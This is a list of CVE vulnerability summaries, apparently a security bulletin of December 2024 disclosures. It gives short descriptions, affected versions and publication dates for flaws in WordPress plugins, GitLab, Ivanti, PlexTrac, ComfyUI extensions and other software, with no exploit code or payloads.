Missing Authorization vulnerability in Loud Dog Redirects allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Redirects: from n/a through 1.2.1. | 2024-12-09 | not yet calculated | CVE-2023-49845 |
| n/a -- n/a |
Missing Authorization vulnerability in wooproductimporter Sharkdropship dropshipping for Aliexpress, eBay, Amazon, etsy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sharkdropship dropshipping for Aliexpress, eBay, Amazon, etsy: from n/a through 2.1.1. | 2024-12-09 | not yet calculated | CVE-2023-49848 |
| n/a -- n/a |
Missing Authorization vulnerability in Aakash Chakravarthy Shortcoder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shortcoder: from n/a through 6.3. | 2024-12-09 | not yet calculated | CVE-2023-49849 |
| n/a -- n/a |
Missing Authorization vulnerability in Ashish Ajani WP Simple HTML Sitemap allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Simple HTML Sitemap: from n/a through 2.7. | 2024-12-09 | not yet calculated | CVE-2023-49850 |
| n/a -- n/a |
Missing Authorization vulnerability in ILMDESIGNS Square Thumbnails allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Square Thumbnails: from n/a through 1.1.1. | 2024-12-09 | not yet calculated | CVE-2023-49851 |
| n/a -- n/a |
Missing Authorization vulnerability in RedNao Smart Forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Smart Forms: from n/a through 2.6.84. | 2024-12-09 | not yet calculated | CVE-2023-49856 |
| n/a -- n/a |
Missing Authorization vulnerability in Awesome Support Team Awesome Support allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Awesome Support: from n/a through 6.1.7. | 2024-12-09 | not yet calculated | CVE-2023-49857 |
| n/a -- n/a |
Missing Authorization vulnerability in Austin Passy Custom Login allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Custom Login: from n/a through 4.1.0. | 2024-12-09 | not yet calculated | CVE-2023-49858 |
| n/a -- n/a |
Missing Authorization vulnerability in Pixelite Login With Ajax allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Login With Ajax: from n/a through 4.1. | 2024-12-09 | not yet calculated | CVE-2023-49859 |
| n/a -- n/a |
Missing Authorization vulnerability in socialmediafeather Social Media Feather allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Social Media Feather: from n/a through 2.1.3. | 2024-12-09 | not yet calculated | CVE-2023-49861 |
| n/a -- n/a |
Missing Authorization vulnerability in WPSAAD Alt Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Alt Manager: from n/a through 1.6.1. | 2024-12-09 | not yet calculated | CVE-2023-50373 |
| n/a -- n/a |
Missing Authorization vulnerability in Translate AI Multilingual Solutions Google Language Translator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Google Language Translator: from n/a through 6.0.19. | 2024-12-09 | not yet calculated | CVE-2023-50375 |
| n/a -- n/a |
Missing Authorization vulnerability in Molongui Molongui allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Molongui: from n/a through 4.7.3. | 2024-12-09 | not yet calculated | CVE-2023-50876 |
| n/a -- n/a |
Missing Authorization vulnerability in woobewoo Product Filter by WBW allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Filter by WBW: from n/a through 2.5.0. | 2024-12-09 | not yet calculated | CVE-2023-50877 |
| n/a -- n/a |
Missing Authorization vulnerability in ProfilePress Membership Team ProfilePress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ProfilePress: from n/a through 4.13.2. | 2024-12-09 | not yet calculated | CVE-2023-50882 |
| n/a -- n/a |
Missing Authorization vulnerability in LA-Studio LA-Studio Element Kit for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LA-Studio Element Kit for Elementor: from n/a through 1.1.5. | 2024-12-09 | not yet calculated | CVE-2023-50884 |
| n/a -- n/a |
Missing Authorization vulnerability in UserFeedback Team User Feedback allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects User Feedback: from n/a through 1.0.10. | 2024-12-09 | not yet calculated | CVE-2023-50887 |
| n/a -- n/a |
Missing Authorization vulnerability in MultiVendorX Product Catalog Enquiry for WooCommerce by MultiVendorX allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Catalog Enquiry for WooCommerce by MultiVendorX: from n/a through 5.0.2. | 2024-12-09 | not yet calculated | CVE-2023-50899 |
| n/a -- n/a |
Missing Authorization vulnerability in Wpmet Metform Elementor Contact Form Builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Metform Elementor Contact Form Builder: from n/a through 3.4.0. | 2024-12-09 | not yet calculated | CVE-2023-50903 |
| n/a -- n/a |
Missing Authorization vulnerability in Poll Maker Team Poll Maker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Poll Maker: from n/a through 4.8.0. | 2024-12-09 | not yet calculated | CVE-2023-50904 |
| n/a -- n/a |
Missing Authorization vulnerability in supsystic.com Popup by Supsystic allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Popup by Supsystic: from n/a through 1.10.19. | 2024-12-09 | not yet calculated | CVE-2023-51353 |
| n/a -- n/a |
Missing Authorization vulnerability in MultiVendorX WC Marketplace allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WC Marketplace: from n/a through 4.0.23. | 2024-12-09 | not yet calculated | CVE-2023-51355 |
| n/a -- n/a |
Missing Authorization vulnerability in Conversios Conversios.io allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Conversios.io: from n/a through 6.5.0. | 2024-12-09 | not yet calculated | CVE-2023-51357 |
| n/a -- n/a |
Missing Authorization vulnerability in WPDeveloper Essential Blocks for Gutenberg allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Essential Blocks for Gutenberg: from n/a through 4.2.0. | 2024-12-09 | not yet calculated | CVE-2023-51359 |
| n/a -- n/a |
Missing Authorization vulnerability in WPDeveloper Essential Blocks for Gutenberg allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Essential Blocks for Gutenberg: from n/a through 4.2.0. | 2024-12-09 | not yet calculated | CVE-2023-51360 |
| n/a -- n/a |
Missing Authorization vulnerability in Premio All-in-one Floating Contact Form - My Sticky Elements allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects All-in-one Floating Contact Form - My Sticky Elements: from n/a through 2.1.3. | 2024-12-09 | not yet calculated | CVE-2023-51362 |
| n/a -- n/a |
A maliciously crafted FBX file, when parsed through Autodesk FBX SDK, may force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2024-12-09 | not yet calculated | CVE-2023-7298 |
| n/a -- n/a |
The LearnPress WordPress plugin before 4.2.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-12 | not yet calculated | CVE-2024-10010 |
| n/a -- n/a |
An issue has been discovered in GitLab EE affecting all versions starting from 14.3 before 17.4.6, all versions starting from 17.5 before 17.5.4 all versions starting from 17.6 before 17.6.2, that allows group users to view confidential incident title through the Wiki History Diff feature, potentially leading to information disclosure. | 2024-12-12 | not yet calculated | CVE-2024-10043 |
| n/a -- n/a |
Insufficient permissions in Ivanti Patch SDK before version 9.7.703 allows a local authenticated attacker to delete arbitrary files. | 2024-12-10 | not yet calculated | CVE-2024-10256 |
| n/a -- n/a |
An out of bounds read due to improper input validation in HeapObjMapImpl.cpp in NI LabVIEW may disclose information or result in arbitrary code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q3 and prior versions. | 2024-12-10 | not yet calculated | CVE-2024-10494 |
| n/a -- n/a |
An out of bounds read due to improper input validation when loading the font table in fontmgr.cpp in NI LabVIEW may disclose information or result in arbitrary code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q3 and prior versions. | 2024-12-10 | not yet calculated | CVE-2024-10495 |
| n/a -- n/a |
An out of bounds read due to improper input validation in BuildFontMap in fontmgr.cpp in NI LabVIEW may disclose information or result in arbitrary code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q3 and prior versions. | 2024-12-10 | not yet calculated | CVE-2024-10496 |
| n/a -- n/a |
The AI Engine WordPress plugin before 2.6.5 does not sanitize and escape a parameter from one of its RESP API endpoint before using it in a SQL statement, allowing admins to perform SQL injection attacks | 2024-12-12 | not yet calculated | CVE-2024-10499 |
| n/a -- n/a |
CWE-287: Improper Authentication vulnerability exists that could cause Denial of access to the web interface when someone on the local network repeatedly requests the /accessdenied URL. | 2024-12-11 | not yet calculated | CVE-2024-10511 |
| n/a -- n/a |
The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content WordPress plugin before 4.15.15 does not sanitise and escape some of its Drag & Drop Builder fields, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-12 | not yet calculated | CVE-2024-10517 |
| n/a -- n/a |
The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content WordPress plugin before 4.15.15 does not sanitise and escape some of its Membership Plan settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-12 | not yet calculated | CVE-2024-10518 |
| n/a -- n/a |
The Ajax Search Lite WordPress plugin before 4.12.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-12 | not yet calculated | CVE-2024-10568 |
| n/a -- n/a |
The Gutenberg Blocks with AI by Kadence WP WordPress plugin before 3.2.54 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-12-12 | not yet calculated | CVE-2024-10637 |
| n/a -- n/a |
The Ultimate Blocks WordPress plugin before 3.2.4 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-12-13 | not yet calculated | CVE-2024-10678 |
| n/a -- n/a |
The System Dashboard WordPress plugin before 2.8.15 does not validate user input used in a path, which could allow high privilege users such as admin to perform path traversal attacks an read arbitrary files on the server | 2024-12-10 | not yet calculated | CVE-2024-10708 |
| n/a -- n/a |
The Image Widget WordPress plugin before 4.4.11 does not sanitise and escape some of its Image Widget settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-13 | not yet calculated | CVE-2024-10939 |
| n/a -- n/a |
The The Active Products Tables for WooCommerce. Use constructor to create tables plugin for WordPress is vulnerable to arbitrary shortcode execution via woot_get_smth AJAX action in all versions up to, and including, 1.0.6.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2024-12-10 | not yet calculated | CVE-2024-10959 |
| n/a -- n/a |
When asked to both use a `.netrc` file for credentials and to follow HTTP redirects, curl could leak the password used for the first host to the followed-to host under certain circumstances. This flaw only manifests itself if the netrc file has an entry that matches the redirect target hostname but the entry either omits just the password or omits both login and password. | 2024-12-11 | not yet calculated | CVE-2024-11053 |
| n/a -- n/a |
The Simple Restrict plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.7 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator. | 2024-12-10 | not yet calculated | CVE-2024-11106 |
| n/a -- n/a |
The System Dashboard WordPress plugin before 2.8.15 does not sanitise and escape some parameters when outputting them in the page, which could allow unauthenticated users to perform Cross-Site Scripting attacks. | 2024-12-10 | not yet calculated | CVE-2024-11107 |
| n/a -- n/a |
A maliciously crafted PDF file, when parsed through Autodesk Revit, can force an Out-of-Bounds Read. A malicious actor can leverage this vulnerability to cause a crash or could lead to an arbitrary memory leak. | 2024-12-09 | not yet calculated | CVE-2024-11268 |
| n/a -- n/a |
An issue was discovered in GitLab CE/EE affecting all versions starting from 16.1 prior to 17.4.6, starting from 17.5 prior to 17.5.4, and starting from 17.6 prior to 17.6.2, injection of NEL headers in k8s proxy response could lead to session data exfiltration. | 2024-12-12 | not yet calculated | CVE-2024-11274 |
| n/a -- n/a |
Rapid7 Insight Platform versions prior to November 13th 2024, suffer from a privilege escalation vulnerability whereby, due to a lack of authorization checks, an attacker can successfully update the password policy in the platform settings as a standard user by crafting an API (the functionality was not possible through the platform's User Interface). This vulnerability has been fixed as of November 13th 2024. | 2024-12-11 | not yet calculated | CVE-2024-11401 |
| n/a -- n/a |
A maliciously crafted DLL file, when placed in the same directory as an RVT file could be loaded by Autodesk Revit, and execute arbitrary code in the context of the current process due to an untrusted search patch being utilized. | 2024-12-09 | not yet calculated | CVE-2024-11454 |
| n/a -- n/a |
Under specific circumstances, insecure permissions in Ivanti Performance Manager before version 2024.3 HF1, 2024.1 HF1, or 2023.3 HF1 allows a local authenticated attacker to achieve local privilege escalation. | 2024-12-11 | not yet calculated | CVE-2024-11597 |
| n/a -- n/a |
Under specific circumstances, insecure permissions in Ivanti Application Control before version 2024.3 HF1, 2024.1 HF2, or 2023.3 HF3 allows a local authenticated attacker to achieve local privilege escalation. | 2024-12-11 | not yet calculated | CVE-2024-11598 |
| n/a -- n/a |
A maliciously crafted SKP file, when linked or imported into Autodesk Revit, can be used to cause a Heap-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2024-12-09 | not yet calculated | CVE-2024-11608 |
| n/a -- n/a |
Argument injection in Ivanti Connect Secure before version 22.7R2.4 allows a remote authenticated attacker with admin privileges to achieve remote code execution | 2024-12-10 | not yet calculated | CVE-2024-11633 |
| n/a -- n/a |
Command injection in Ivanti Connect Secure before version 22.7R2.3 and Ivanti Policy Secure before version 22.7R1.2 allows a remote authenticated attacker with admin privileges to achieve remote code execution. (Not applicable to 9.1Rx) | 2024-12-10 | not yet calculated | CVE-2024-11634 |
| n/a -- n/a |
An authentication bypass in the admin web console of Ivanti CSA before 5.0.3 allows a remote unauthenticated attacker to gain administrative access | 2024-12-10 | not yet calculated | CVE-2024-11639 |
| n/a -- n/a |
CWE-20: Improper Input Validation vulnerability exists that could lead to a denial of service and a loss of confidentiality, integrity of the controller when an unauthenticated crafted Modbus packet is sent to the device. | 2024-12-11 | not yet calculated | CVE-2024-11737 |
| n/a -- n/a |
Command injection in the admin web console of Ivanti CSA before version 5.0.3 allows a remote authenticated attacker with admin privileges to achieve remote code execution. | 2024-12-10 | not yet calculated | CVE-2024-11772 |
| n/a -- n/a |
SQL injection in the admin web console of Ivanti CSA before version 5.0.3 allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements. | 2024-12-10 | not yet calculated | CVE-2024-11773 |
| n/a -- n/a |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in PlexTrac allows arbitrary file writes.This issue affects PlexTrac: from 1.61.3 before 2.8.1. | 2024-12-13 | not yet calculated | CVE-2024-11833 |
| n/a -- n/a |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in PlexTrac allows arbitrary file writes.This issue affects PlexTrac: from 1.61.3 before 2.8.1. | 2024-12-13 | not yet calculated | CVE-2024-11834 |
| n/a -- n/a |
Uncontrolled Resource Consumption vulnerability in PlexTrac allows WebSocket DoS.This issue affects PlexTrac: from 1.61.3 before 2.8.1. | 2024-12-13 | not yet calculated | CVE-2024-11835 |
| n/a -- n/a |
Server-Side Request Forgery (SSRF) vulnerability in PlexTrac allowing requests to internal system resources.This issue affects PlexTrac: from 1.61.3 before 2.8.1. | 2024-12-13 | not yet calculated | CVE-2024-11836 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an N1QL Command ('N1QL Injection') vulnerability in PlexTrac allows N1QL Injection.This issue affects PlexTrac: from 1.61.3 before 2.8.1. | 2024-12-13 | not yet calculated | CVE-2024-11837 |
| n/a -- n/a |
External Control of File Name or Path vulnerability in PlexTrac allows Local Code Inclusion through use of an undocumented API endpoint.This issue affects PlexTrac: from 1.61.3 before 2.8.1. | 2024-12-13 | not yet calculated | CVE-2024-11838 |
| n/a -- n/a |
Deserialization of Untrusted Data vulnerability in PlexTrac (Runbooks modules) which allows Object Injection and arbitrary file writes.This issue affects PlexTrac: from 1.61.3 before 2.8.1. | 2024-12-13 | not yet calculated | CVE-2024-11839 |
| n/a -- n/a |
A flaw was found in Radare2, which contains a command injection vulnerability caused by insufficient input validation when handling Pebble Application files. Maliciously crafted inputs can inject shell commands during command parsing, leading to unintended behavior during file processing? | 2024-12-15 | not yet calculated | CVE-2024-11858 |
| n/a -- n/a |
The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.7.3 via class-lp-rest-material-controller.php. This makes it possible for unauthenticated attackers to extract potentially sensitive paid course material. | 2024-12-10 | not yet calculated | CVE-2024-11868 |
| n/a -- n/a |
Epic Games Launcher Incorrect Default Permissions Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Epic Games Launcher. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the product installer. The product applies incorrect default permissions to a sensitive folder. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-24329. | 2024-12-12 | not yet calculated | CVE-2024-11872 |
| n/a -- n/a |
XnSoft XnView Classic RWZ File Parsing Integer Underflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of XnSoft XnView Classic. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of RWZ files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer underflow before writing to memory. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22913. | 2024-12-12 | not yet calculated | CVE-2024-11950 |
| n/a -- n/a |
Improper input handling in the 'Host Header' allows an unauthenticated attacker to store a payload in web application logs. When an Administrator views the logs using the application's standard functionality, it enables the execution of the payload, resulting in Stored XSS or 'Cross-Site Scripting'. | 2024-12-13 | not yet calculated | CVE-2024-11986 |
| n/a -- n/a |
Motoko's incremental garbage collector is impacted by an uninitialized memory access bug, caused by incorrect use of write barriers in a few locations. This vulnerability could potentially allow unauthorized read or write access to a Canister's memory. However, exploiting this bug requires the Canister to enable the incremental garbage collector or enhanced orthogonal persistence, which are non-default features in Motoko. | 2024-12-09 | not yet calculated | CVE-2024-11991 |
| n/a -- n/a |
User credentials (login & password) are inserted into log files when a user tries to authenticate using a version of a Web client that is not compatible with that of the PcVue Web back end. By exploiting this vulnerability, an attacker could retrieve the credentials of a user by accessing the Log File. Successful exploitation of this vulnerability could lead to unauthorized access to the application. | 2024-12-09 | not yet calculated | CVE-2024-12057 |
| n/a -- n/a |
An Improper Certificate Validation vulnerability exists in Tenable Security Center where an authenticated, privileged attacker could intercept email messages sent from Security Center via a rogue SMTP server. | 2024-12-09 | not yet calculated | CVE-2024-12174 |
| n/a -- n/a |
The vulnerability occurs in the parsing of CSP files. The issues result from the lack of proper validation of user-supplied data, which could allow reading past the end of allocated data structures, resulting in execution of arbitrary code. | 2024-12-13 | not yet calculated | CVE-2024-12212 |
| n/a -- n/a |
A security issue exists in Vertex Gemini API for customers using VPC-SC. By utilizing a custom crafted file URI for image input, data exfiltration is possible due to requests being routed outside the VPC-SC security perimeter, circumventing the intended security restrictions of VPC-SC. No further fix actions are needed. Google Cloud Platform implemented a fix to return an error message when a media file URL is specified in the fileUri parameter and VPC Service Controls is enabled. Other use cases are unaffected. | 2024-12-10 | not yet calculated | CVE-2024-12236 |
| n/a -- n/a |
The Accept Stripe Payments Using Contact Form 7 plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5 via the cf7sa-info.php file that returns phpinfo() data. This makes it possible for unauthenticated attackers to extract configuration information that can be leveraged in another attack. | 2024-12-12 | not yet calculated | CVE-2024-12255 |
| n/a -- n/a |
MOBATIME Network Master Clock - DTS 4801 allows attackers to use SSH to gain initial access using default credentials. | 2024-12-10 | not yet calculated | CVE-2024-12286 |
| n/a -- n/a |
Boundary Community Edition and Boundary Enterprise ("Boundary") incorrectly handle HTTP requests during the initialization of the Boundary controller, which may cause the Boundary server to terminate prematurely. Boundary is only vulnerable to this flaw during the initialization of the Boundary controller, which on average is measured in milliseconds during the Boundary startup process. This vulnerability, CVE-2024-12289, is fixed in Boundary Community Edition and Boundary Enterprise 0.16.4, 0.17.3, 0.18.2. | 2024-12-12 | not yet calculated | CVE-2024-12289 |
| n/a -- n/a |
An issue was discovered in GitLab CE/EE affecting all versions starting from 11.0 prior to 17.4.6, starting from 17.5 prior to 17.5.4, and starting from 17.6 prior to 17.6.2, where sensitive information passed in GraphQL mutations may have been retained in GraphQL logs. | 2024-12-12 | not yet calculated | CVE-2024-12292 |
| n/a -- n/a |
An object-level access control vulnerability in Unifiedtransform version 2.0 and potentially earlier versions allows unauthorized access to student grades. A malicious student user can view grades of other students by manipulating the student_id parameter in the marks viewing endpoint. The vulnerability exists due to insufficient access control checks in MarkController.php. At the time of publication of the CVE no patch is available. | 2024-12-09 | not yet calculated | CVE-2024-12305 |
| n/a -- n/a |
Multiple access control vulnerabilities in Unifiedtransform version 2.0 and potentially earlier versions allow unauthorized access to personal information of students and teachers. The vulnerabilities include both function-level access control issues in list viewing endpoints and object-level access control issues in profile viewing endpoints. A malicious student user can access personal information of other students and teachers through these vulnerabilities. At the time of publication of the CVE no patch is available. | 2024-12-09 | not yet calculated | CVE-2024-12306 |
| n/a -- n/a |
A function-level access control vulnerability in Unifiedtransform version 2.0 and potentially earlier versions allows teachers to modify student personal data without proper authorization. The vulnerability exists due to missing access control checks in the student editing functionality. At the time of publication of the CVE no patch is available. | 2024-12-09 | not yet calculated | CVE-2024-12307 |
| n/a -- n/a |
A vulnerability has been found in Talentera up to 20241128 and classified as problematic. This vulnerability affects unknown code of the file /app/control/byt_cv_manager. The manipulation of the argument redirect_url leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The provided PoC only works in Mozilla Firefox. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-09 | not yet calculated | CVE-2024-12346 |
| n/a -- n/a |
A vulnerability was found in Guangzhou Huayi Intelligent Technology Jeewms up to 1.0.0 and classified as critical. This issue affects some unknown processing of the file /jeewms_war/webpage/system/druid/index.html of the component Druid Monitoring Interface. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-09 | not yet calculated | CVE-2024-12347 |
| n/a -- n/a |
A vulnerability was found in Guizhou Xiaoma Technology jpress 5.1.2. It has been classified as problematic. Affected is the function AttachmentUtils.isUnSafe of the file /commons/attachment/upload of the component Attachment Upload Handler. The manipulation of the argument files[] leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-09 | not yet calculated | CVE-2024-12348 |
| n/a -- n/a |
Insufficient permissions in the TeamViewer Patch & Asset Management component prior to version 24.12 on Windows allows a local authenticated user to delete arbitrary files. TeamViewer Patch & Asset Management is part of TeamViewer Remote Management. | 2024-12-11 | not yet calculated | CVE-2024-12363 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Drupal Core allows Cross-Site Scripting (XSS).This issue affects Drupal Core: from 8.8.0 before 10.2.11, from 10.3.0 before 10.3.9, from 11.0.0 before 11.0.8. | 2024-12-10 | not yet calculated | CVE-2024-12393 |
| n/a -- n/a |
A vulnerability was found in code-projects Online Class and Exam Scheduling System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /pages/teacher_save.php. The manipulation of the argument salut leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-12 | not yet calculated | CVE-2024-12490 |
| n/a -- n/a |
Wacom Center WTabletServicePro Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Wacom Center. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within WTabletServicePro.exe. By creating a symbolic link, an attacker can abuse the service to create an arbitrary file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-25359. | 2024-12-13 | not yet calculated | CVE-2024-12552 |
| n/a -- n/a |
GeoVision GV-ASManager Missing Authorization Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of GeoVision GV-ASManager. Although authentication is required to exploit this vulnerability, default guest credentials may be used. The specific flaw exists within the GV-ASWeb service. The issue results from the lack of authorization prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-25394. | 2024-12-13 | not yet calculated | CVE-2024-12553 |
| n/a -- n/a |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability was discovered in Open Design Alliance CDE inWEB SDK before 2025.3. Installing CDE Server with default settings allows unauthorized users to visit prometheus metrics page. This can allow attackers to understand more things about the target application which may help in further investigation and exploitation. | 2024-12-12 | not yet calculated | CVE-2024-12564 |
| n/a -- n/a |
An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.7 prior to 17.4.6, from 17.5 prior to 17.5.4, and from 17.6 prior to 17.6.2. It may have been possible for an attacker with a victim's `CI_JOB_TOKEN` to obtain a GitLab session token belonging to the victim. | 2024-12-12 | not yet calculated | CVE-2024-12570 |
| n/a -- n/a |
A logic vulnerability in the the mobile application (com.transsion.applock) can lead to bypassing the application password. | 2024-12-13 | not yet calculated | CVE-2024-12603 |
| n/a -- n/a |
Versions of the package luigi before 3.6.0 are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) due to improper destination file path validation in the _extract_packages_archive function. | 2024-12-10 | not yet calculated | CVE-2024-21542 |
| n/a -- n/a |
Versions of the package djoser before 2.3.0 are vulnerable to Authentication Bypass when the authenticate() function fails. This is because the system falls back to querying the database directly, granting access to users with valid credentials, and eventually bypassing custom authentication checks such as two-factor authentication, LDAP validations, or requirements from configured AUTHENTICATION_BACKENDS. | 2024-12-13 | not yet calculated | CVE-2024-21543 |
| n/a -- n/a |
Versions of the package spatie/browsershot before 5.0.1 are vulnerable to Improper Input Validation due to improper URL validation through the setUrl method. An attacker can exploit this vulnerability by using leading whitespace (%20) before the file:// protocol, resulting in Local File Inclusion, which allows the attacker to read sensitive files on the server. | 2024-12-13 | not yet calculated | CVE-2024-21544 |
| n/a -- n/a |
The issue stems from a missing validation of the pip field in a POST request sent to the /customnode/install endpoint used to install custom nodes which is added to the server by the extension. This allows an attacker to craft a request that triggers a pip install on a user controlled package or URL, resulting in remote code execution (RCE) on the server. | 2024-12-12 | not yet calculated | CVE-2024-21574 |
| n/a -- n/a |
ComfyUI-Impact-Pack is vulnerable to Path Traversal. The issue stems from missing validation of the `image.filename` field in a POST request sent to the `/upload/temp` endpoint added by the extension to the server. This results in writing arbitrary files to the file system which may, under some conditions, result in remote code execution (RCE). | 2024-12-12 | not yet calculated | CVE-2024-21575 |
| n/a -- n/a |
ComfyUI-Bmad-Nodes is vulnerable to Code Injection. The issue stems from a validation bypass in the BuildColorRangeHSVAdvanced, FilterContour and FindContour custom nodes. In the entrypoint function to each node, there's a call to eval which can be triggered by generating a workflow that injects a crafted string into the node. This can result in executing arbitrary code on the server. | 2024-12-13 | not yet calculated | CVE-2024-21576 |
| n/a -- n/a |
ComfyUI-Ace-Nodes is vulnerable to Code Injection. The ACE_ExpressionEval node contains an eval() in its entrypoint function that accepts arbitrary user-controlled data. A user can create a workflow that results in executing arbitrary code on the server. | 2024-12-13 | not yet calculated | CVE-2024-21577 |
| n/a -- n/a |
Dell RecoverPoint for Virtual Machines 6.0.x contains an OS Command injection vulnerability. A low privileged remote attacker could potentially exploit this vulnerability by running any command as root, leading to gaining of root-level access and compromise of complete system. | 2024-12-13 | not yet calculated | CVE-2024-22461 |
| n/a -- n/a |
Dell RecoverPoint for Virtual Machines 6.0.x contains an Improper access control vulnerability. A low privileged local attacker could potentially exploit this vulnerability leading to gaining access to unauthorized data for a limited time. | 2024-12-13 | not yet calculated | CVE-2024-24902 |
| n/a -- n/a |
An unauthenticated attacker with network access to the affected device's web interface can execute any system command via the "msg_events.php" script as the www-data user. The HTTP GET parameter "data" is not properly sanitized. | 2024-12-10 | not yet calculated | CVE-2024-28138 |
| n/a -- n/a |
The www-data user can elevate its privileges because sudo is configured to allow the execution of the mount command as root without a password. Therefore, the privileges can be escalated to the root user. The risk has been accepted by the vendor and won't be fixed in the near future. | 2024-12-11 | not yet calculated | CVE-2024-28139 |
| n/a -- n/a |
The scanner device boots into a kiosk mode by default and opens the Scan2Net interface in a browser window. This browser is run with the permissions of the root user. There are also several other applications running as root user. This can be confirmed by running "ps aux" as the root user and observing the output. | 2024-12-11 | not yet calculated | CVE-2024-28140 |
| n/a -- n/a |
The web application is not protected against cross-site request forgery attacks. Therefore, an attacker can trick users into performing actions on the application when they visit an attacker-controlled website or click on a malicious link. E.g. an attacker can forge malicious links to reset the admin password or create new users. | 2024-12-11 | not yet calculated | CVE-2024-28141 |
| n/a -- n/a |
